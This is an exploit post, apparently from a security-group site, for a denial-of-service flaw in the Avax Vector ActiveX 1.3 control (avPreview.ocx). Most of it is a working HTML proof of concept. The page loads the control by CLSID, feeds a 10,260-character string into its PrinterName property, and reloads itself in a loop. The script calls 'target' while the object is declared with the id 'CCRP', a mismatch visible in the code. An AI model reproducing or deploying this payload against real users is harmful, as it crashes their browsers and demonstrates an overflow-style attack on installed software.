Avax Vector Active-X control version 1.3 proof of concept denial of service exploit that takes advantage of avPreview.ocx.
c69169d02a1890b915d3de37f255e288faeb7f272b5aa090a2d7ac024a7d5ebd
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Sec-r1z.com
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Vulnerabilities : Avax Vector ActiveX 1.3 (avPreview.ocx) Denial of Service Exploit
Bug Hunter: Satan_Hackers (Satan_hackers@yahoo.com)
Greetz.: All Sec-r1z member's ...
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
<html>
<object classid='clsid:9589AEC9-1C2D-4428-B7E8-63B39D356F9C' id='CCRP' ></object>
<script language='vbscript'>
argCount = 1
arg1=String(10260, "A")
target.PrinterName = arg1
</script>
<script language='javascript'>
document.location.reload()
</script>